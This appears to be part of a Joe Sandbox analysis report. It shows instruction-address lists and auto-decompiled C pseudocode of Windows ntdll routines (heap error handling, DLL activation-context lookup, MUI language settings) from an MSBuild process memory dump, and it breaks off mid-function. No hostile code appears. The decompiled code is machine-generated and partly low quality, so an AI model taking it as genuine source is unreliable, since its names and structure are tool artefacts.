                                                                                                0x01161c5a
                                                                                                0x01161c65
                                                                                                0x01161c67
                                                                                                0x00000000
                                                                                                0x01161c6e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01161c67
                                                                                                0x01161cdc
                                                                                                0x01161ce5
                                                                                                0x01161d04
                                                                                                0x01161d05
                                                                                                0x01161ce7
                                                                                                0x01161cfc
                                                                                                0x01161d01
                                                                                                0x01161d0b
                                                                                                0x01161d17
                                                                                                0x01161d1f
                                                                                                0x01161d25
                                                                                                0x01161d30
                                                                                                0x01161d4f
                                                                                                0x01161d50
                                                                                                0x01161d32
                                                                                                0x01161d47
                                                                                                0x01161d4c
                                                                                                0x01161d61
                                                                                                0x01161d67
                                                                                                0x01161d68
                                                                                                0x01161d6e
                                                                                                0x01161d79
                                                                                                0x01161d98
                                                                                                0x01161d99
                                                                                                0x01161d7b
                                                                                                0x01161d90
                                                                                                0x01161d95
                                                                                                0x01161daa
                                                                                                0x01161db0
                                                                                                0x01161db1
                                                                                                0x01161db7
                                                                                                0x01161dc2
                                                                                                0x01161de1
                                                                                                0x01161de2
                                                                                                0x01161dc4
                                                                                                0x01161dd9
                                                                                                0x01161dde
                                                                                                0x01161df3
                                                                                                0x01161df9
                                                                                                0x01161dfa
                                                                                                0x01161e00
                                                                                                0x01161e0a
                                                                                                0x01161e13
                                                                                                0x01161e32
                                                                                                0x01161e33
                                                                                                0x01161e15
                                                                                                0x01161e2a
                                                                                                0x01161e2f
                                                                                                0x01161e39
                                                                                                0x01161e4a
                                                                                                0x01161e02
                                                                                                0x01161e02
                                                                                                0x01161e08
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01161e08
                                                                                                0x01161e5b
                                                                                                0x01161e7a
                                                                                                0x01161e7b
                                                                                                0x01161e5d
                                                                                                0x01161e72
                                                                                                0x01161e77
                                                                                                0x01161e95

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                                                                • API String ID: 0-2897834094
                                                                                                • Opcode ID: e5dd65ed982a8f507fdfdef6fc17964e3a6a7ba7d22fc44ddc0a783d4c8b2331
                                                                                                • Instruction ID: f098917052f19fc4a13f24d91a478424287d3152a373f1c7badb6405389be124
                                                                                                • Opcode Fuzzy Hash: e5dd65ed982a8f507fdfdef6fc17964e3a6a7ba7d22fc44ddc0a783d4c8b2331
                                                                                                • Instruction Fuzzy Hash: E861FB33915145EFD72EEB86D494D2873A9E794930B8A803EF4896F311D7329C90DB0A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010D8E00 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 126timeCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 44%
                                                                                                			E010D8E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x119d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x1198464; // 0x74720110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x1195780 & 0x00000003) != 0) {
							E01125510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x1195780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E010EB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x1197984; // 0xc52bd0
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x1198464; // 0x74720110
					 *0x119b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E010D9B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x1195780 & 0x00000005) != 0) {
						_push(_t49);
						E01125510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                                                                                                0x010d8e0f
                                                                                                0x010d8e16
                                                                                                0x010d8e19
                                                                                                0x010d8e1b
                                                                                                0x010d8e21
                                                                                                0x010d8e7f
                                                                                                0x010d8e85
                                                                                                0x01119354
                                                                                                0x0111936c
                                                                                                0x01119371
                                                                                                0x0111937b
                                                                                                0x01119381
                                                                                                0x01119381
                                                                                                0x0111937b
                                                                                                0x010d8e9d
                                                                                                0x010d8e9d
                                                                                                0x010d8e29
                                                                                                0x010d8e2c
                                                                                                0x010d8e38
                                                                                                0x010d8e3e
                                                                                                0x010d8e43
                                                                                                0x010d8eb5
                                                                                                0x010d8eb9
                                                                                                0x011192aa
                                                                                                0x011192af
                                                                                                0x011192e8
                                                                                                0x011192e8
                                                                                                0x011192af
                                                                                                0x010d8eb9
                                                                                                0x010d8e45
                                                                                                0x010d8e53
                                                                                                0x010d8e5b
                                                                                                0x010d8e5f
                                                                                                0x010d8e78
                                                                                                0x010d8e78
                                                                                                0x010d8e7d
                                                                                                0x010d8ec3
                                                                                                0x010d8ecd
                                                                                                0x010d8ed2
                                                                                                0x010d8ed2
                                                                                                0x010d8ec5
                                                                                                0x010d8ec5
                                                                                                0x00000000
                                                                                                0x010d8e7d
                                                                                                0x010d8e67
                                                                                                0x010d8ea4
                                                                                                0x0111931a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01119320
                                                                                                0x010d8ea4
                                                                                                0x010d8e70
                                                                                                0x01119325
                                                                                                0x01119340
                                                                                                0x01119345
                                                                                                0x01119345
                                                                                                0x010d8e76
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000

                                                                                                APIs
                                                                                                Strings
                                                                                                • LdrpFindDllActivationContext, xrefs: 01119331, 0111935D
                                                                                                • Querying the active activation context failed with status 0x%08lx, xrefs: 01119357
                                                                                                • minkernel\ntdll\ldrsnap.c, xrefs: 0111933B, 01119367
                                                                                                • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0111932A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID: DebugPrintTimes
                                                                                                • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                • API String ID: 3446177414-3779518884
                                                                                                • Opcode ID: 2086dc625f15f832bd7de047bd8f310bdeedac5dc95582ff0244501fbbd9d9c0
                                                                                                • Instruction ID: f5d49e836462dab4c347f440913f8a755d2430e37b235ce25b77c30a2bf0f508
                                                                                                • Opcode Fuzzy Hash: 2086dc625f15f832bd7de047bd8f310bdeedac5dc95582ff0244501fbbd9d9c0
                                                                                                • Instruction Fuzzy Hash: 31412A31A003159FDBBAAA1CC889A79B6F5BB01718F06C5BBD9E457151E7709DC08FC1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010B3D34 Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 96%
                                                                                                			E010B3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E010B1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E010B1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E010B1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E010B1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E010B1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L010C4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E010EF3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E010F1370(_t276, 0x1084e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E010EBB40(0,  &_v68, _t170);
									if(L010B43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E010EBB40(_t257,  &_v68, _t243);
								if(L010B43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E010F1370(_t278, 0x1084e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L010C4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E010EF3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E010F1370(_v16, 0x1084e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E010EBB40(_t262,  &_v68, _t244);
								if(L010B43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E010F1370(_t282, 0x1084e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E010EBB40(_t262,  &_v68, _t201);
							if(L010B43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L010C4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E010EF3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E010F1370(_t280, 0x1084e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E010EBB40(_t267,  &_v68, _t245);
							if(L010B43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E010F1370(_t284, 0x1084e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E010EBB40(_t267,  &_v68, _t224);
						if(L010B43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                                                                                0x010b3d3c
                                                                                                0x010b3d42
                                                                                                0x010b3d44
                                                                                                0x010b3d46
                                                                                                0x010b3d49
                                                                                                0x010b3d4c
                                                                                                0x010b3d4f
                                                                                                0x010b3d52
                                                                                                0x010b3d55
                                                                                                0x010b3d58
                                                                                                0x010b3d5b
                                                                                                0x010b3d5f
                                                                                                0x010b3d61
                                                                                                0x010b3d66
                                                                                                0x01108213
                                                                                                0x01108218
                                                                                                0x010b4085
                                                                                                0x010b4088
                                                                                                0x010b408e
                                                                                                0x010b4094
                                                                                                0x010b409a
                                                                                                0x010b40a0
                                                                                                0x010b40a6
                                                                                                0x010b40a9
                                                                                                0x010b40af
                                                                                                0x010b40b6
                                                                                                0x010b40bd
                                                                                                0x010b40bd
                                                                                                0x010b3d83
                                                                                                0x0110821f
                                                                                                0x01108229
                                                                                                0x01108238
                                                                                                0x01108238
                                                                                                0x0110823d
                                                                                                0x0110823d
                                                                                                0x010b3da0
                                                                                                0x010b3daf
                                                                                                0x010b3db5
                                                                                                0x010b3dba
                                                                                                0x010b3dba
                                                                                                0x010b3dd4
                                                                                                0x010b3e94
                                                                                                0x010b3eab
                                                                                                0x010b3f6d
                                                                                                0x010b3f84
                                                                                                0x010b406b
                                                                                                0x010b406b
                                                                                                0x010b406e
                                                                                                0x010b406e
                                                                                                0x010b4070
                                                                                                0x010b4074
                                                                                                0x01108351
                                                                                                0x01108351
                                                                                                0x010b407a
                                                                                                0x010b407f
                                                                                                0x0110835d
                                                                                                0x01108370
                                                                                                0x01108377
                                                                                                0x01108379
                                                                                                0x0110837c
                                                                                                0x0110837c
                                                                                                0x0110835d
                                                                                                0x00000000
                                                                                                0x010b407f
                                                                                                0x010b3f8a
                                                                                                0x010b3f8d
                                                                                                0x010b3f90
                                                                                                0x010b3f95
                                                                                                0x0110830d
                                                                                                0x0110830f
                                                                                                0x010b3f9b
                                                                                                0x010b3fac
                                                                                                0x010b3fae
                                                                                                0x010b3fb1
                                                                                                0x010b3fb1
                                                                                                0x010b3fb6
                                                                                                0x01108317
                                                                                                0x0110831a
                                                                                                0x00000000
                                                                                                0x010b3fbc
                                                                                                0x010b3fc1
                                                                                                0x010b3fc9
                                                                                                0x010b3fd7
                                                                                                0x010b3fda
                                                                                                0x010b3fdd
                                                                                                0x010b4021
                                                                                                0x010b4021
                                                                                                0x010b4029
                                                                                                0x010b4030
                                                                                                0x010b4044
                                                                                                0x010b4046
                                                                                                0x010b4046
                                                                                                0x010b4044
                                                                                                0x010b4049
                                                                                                0x01108327
                                                                                                0x01108334
                                                                                                0x01108339
                                                                                                0x0110833c
                                                                                                0x010b404f
                                                                                                0x010b404f
                                                                                                0x010b404f
                                                                                                0x010b4051
                                                                                                0x010b4056
                                                                                                0x010b4063
                                                                                                0x010b4063
                                                                                                0x010b4068
                                                                                                0x00000000
                                                                                                0x010b4068
                                                                                                0x010b3fdf
                                                                                                0x010b3fe2
                                                                                                0x010b3fe4
                                                                                                0x010b3fe7
                                                                                                0x010b3fef
                                                                                                0x010b4003
                                                                                                0x010b4005
                                                                                                0x010b4005
                                                                                                0x010b400c
                                                                                                0x010b4013
                                                                                                0x010b4016
                                                                                                0x010b4017
                                                                                                0x010b401b
                                                                                                0x010b401e
                                                                                                0x00000000
                                                                                                0x010b401e
                                                                                                0x010b3fb6
                                                                                                0x010b3eb1
                                                                                                0x010b3eb4
                                                                                                0x010b3eb7
                                                                                                0x010b3ebc
                                                                                                0x011082a9
                                                                                                0x011082ab
                                                                                                0x010b3ec2
                                                                                                0x010b3ed3
                                                                                                0x010b3ed5
                                                                                                0x010b3ed8
                                                                                                0x010b3ed8
                                                                                                0x010b3edd
                                                                                                0x011082b3
                                                                                                0x011082b6
                                                                                                0x00000000
                                                                                                0x010b3ee3
                                                                                                0x010b3ee8
                                                                                                0x010b3eed
                                                                                                0x010b3ef0
                                                                                                0x010b3ef3
                                                                                                0x010b3f02
                                                                                                0x010b3f05
                                                                                                0x010b3f08
                                                                                                0x011082c0
                                                                                                0x011082c3
                                                                                                0x011082c5
                                                                                                0x011082c8
                                                                                                0x011082d0
                                                                                                0x011082e4
                                                                                                0x011082e6
                                                                                                0x011082e6
                                                                                                0x011082ed
                                                                                                0x011082f4
                                                                                                0x011082f7
                                                                                                0x011082f8
                                                                                                0x011082fc
                                                                                                0x011082ff
                                                                                                0x011082ff
                                                                                                0x010b3f0e
                                                                                                0x010b3f11
                                                                                                0x010b3f16
                                                                                                0x010b3f1d
                                                                                                0x010b3f31
                                                                                                0x01108307
                                                                                                0x01108307
                                                                                                0x010b3f31
                                                                                                0x010b3f39
                                                                                                0x010b3f48
                                                                                                0x010b3f4d
                                                                                                0x010b3f50
                                                                                                0x010b3f50
                                                                                                0x010b3f53
                                                                                                0x010b3f58
                                                                                                0x010b3f65
                                                                                                0x010b3f65
                                                                                                0x010b3f6a
                                                                                                0x00000000
                                                                                                0x010b3f6a
                                                                                                0x010b3edd
                                                                                                0x010b3dda
                                                                                                0x010b3ddd
                                                                                                0x010b3de0
                                                                                                0x010b3de5
                                                                                                0x01108245
                                                                                                0x010b3deb
                                                                                                0x010b3df7
                                                                                                0x010b3dfc
                                                                                                0x010b3dfe
                                                                                                0x010b3e01
                                                                                                0x010b3e01
                                                                                                0x010b3e06
                                                                                                0x0110824d
                                                                                                0x0110824f
                                                                                                0x01108254
                                                                                                0x00000000
                                                                                                0x010b3e0c
                                                                                                0x010b3e11
                                                                                                0x010b3e16
                                                                                                0x010b3e19
                                                                                                0x010b3e29
                                                                                                0x010b3e2c
                                                                                                0x010b3e2f
                                                                                                0x0110825c
                                                                                                0x0110825f
                                                                                                0x01108261
                                                                                                0x01108264
                                                                                                0x0110826c
                                                                                                0x01108280
                                                                                                0x01108282
                                                                                                0x01108282
                                                                                                0x01108289
                                                                                                0x01108290
                                                                                                0x01108293
                                                                                                0x01108294
                                                                                                0x01108298
                                                                                                0x0110829b
                                                                                                0x0110829b
                                                                                                0x010b3e35
                                                                                                0x010b3e38
                                                                                                0x010b3e3d
                                                                                                0x010b3e44
                                                                                                0x010b3e58
                                                                                                0x011082a3
                                                                                                0x011082a3
                                                                                                0x010b3e58
                                                                                                0x010b3e60
                                                                                                0x010b3e6f
                                                                                                0x010b3e74
                                                                                                0x010b3e77
                                                                                                0x010b3e77
                                                                                                0x010b3e7a
                                                                                                0x010b3e7f
                                                                                                0x010b3e8c
                                                                                                0x010b3e8c
                                                                                                0x010b3e91
                                                                                                0x00000000
                                                                                                0x010b3e91

                                                                                                Strings
                                                                                                • WindowsExcludedProcs, xrefs: 010B3D6F
                                                                                                • Kernel-MUI-Language-Disallowed, xrefs: 010B3E97
                                                                                                • Kernel-MUI-Number-Allowed, xrefs: 010B3D8C
                                                                                                • Kernel-MUI-Language-Allowed, xrefs: 010B3DC0
                                                                                                • Kernel-MUI-Language-SKU, xrefs: 010B3F70
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                • API String ID: 0-258546922
                                                                                                • Opcode ID: a6fe31d560859f4c256e3276df8b374b0f78f15dca23d2155d16c57f8876df70
                                                                                                • Instruction ID: 7c8274aa9cb21f6e3a8bf3d80c7944d5062450aed5c3f26447d48e22af02c858
                                                                                                • Opcode Fuzzy Hash: a6fe31d560859f4c256e3276df8b374b0f78f15dca23d2155d16c57f8876df70
                                                                                                • Instruction Fuzzy Hash: 4FF16F72D0421AEFCB16DF98C980AEEBBF9FF58650F15405AE585E7251E7709E00CBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0117E824 Relevance: 6.5, APIs: 4, Instructions: 493timeCOMMONCrypto
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 50%
                                                                                                			E0117E824(signed int __ecx, signed int* __edx) {
				signed int _v8;
				signed char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				unsigned int _v44;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t177;
				signed int _t179;
				unsigned int _t202;
				signed char _t207;
				signed char _t210;
				signed int _t230;
				void* _t244;
				unsigned int _t247;
				signed int _t288;
				signed int _t289;
				signed int _t291;
				signed char _t293;
				signed char _t295;
				signed char _t298;
				intOrPtr* _t303;
				signed int _t310;
				signed char _t316;
				signed int _t319;
				signed char _t323;
				signed char _t330;
				signed int _t334;
				signed int _t337;
				signed int _t341;
				signed char _t345;
				signed char _t347;
				signed int _t353;
				signed char _t354;
				void* _t383;
				signed char _t385;
				signed char _t386;
				unsigned int _t392;
				signed int _t393;
				signed int _t395;
				signed int _t398;
				signed int _t399;
				signed int _t401;
				unsigned int _t403;
				void* _t404;
				unsigned int _t405;
				signed int _t406;
				signed char _t412;
				unsigned int _t413;
				unsigned int _t418;
				void* _t419;
				void* _t420;
				void* _t421;
				void* _t422;
				void* _t423;
				signed char* _t425;
				signed int _t426;
				signed int _t428;
				unsigned int _t430;
				signed int _t431;
				signed int _t433;

				_v8 =  *0x119d360 ^ _t433;
				_v40 = __ecx;
				_v16 = __edx;
				_t289 = 0x4cb2f;
				_t425 = __edx[1];
				_t403 =  *__edx << 2;
				if(_t403 < 8) {
					L3:
					_t404 = _t403 - 1;
					if(_t404 == 0) {
						L16:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						L17:
						_t426 = _v40;
						_v20 = _t426 + 0x1c;
						_t177 = L010CFAD0(_t426 + 0x1c);
						_t385 = 0;
						while(1) {
							L18:
							_t405 =  *(_t426 + 4);
							_t179 = (_t177 | 0xffffffff) << (_t405 & 0x0000001f);
							_t316 = _t289 & _t179;
							_v24 = _t179;
							_v32 = _t316;
							_v12 = _t316 >> 0x18;
							_v36 = _t316 >> 0x10;
							_v28 = _t316 >> 8;
							if(_t385 != 0) {
								goto L21;
							}
							_t418 = _t405 >> 5;
							if(_t418 == 0) {
								_t406 = 0;
								L31:
								if(_t406 == 0) {
									L35:
									E010CFA00(_t289, _t316, _t406, _t426 + 0x1c);
									 *0x119b1e0(0xc +  *_v16 * 4,  *((intOrPtr*)(_t426 + 0x28)));
									_t319 =  *((intOrPtr*)( *((intOrPtr*)(_t426 + 0x20))))();
									_v36 = _t319;
									if(_t319 != 0) {
										asm("stosd");
										asm("stosd");
										asm("stosd");
										_t408 = _v16;
										 *(_t319 + 8) =  *(_t319 + 8) & 0xff000001 | 0x00000001;
										 *((char*)(_t319 + 0xb)) =  *_v16;
										 *(_t319 + 4) = _t289;
										_t53 = _t319 + 0xc; // 0xc
										E010C2280(E010EF3E0(_t53,  *((intOrPtr*)(_v16 + 4)),  *_v16 << 2), _v20);
										_t428 = _v40;
										_t386 = 0;
										while(1) {
											L38:
											_t202 =  *(_t428 + 4);
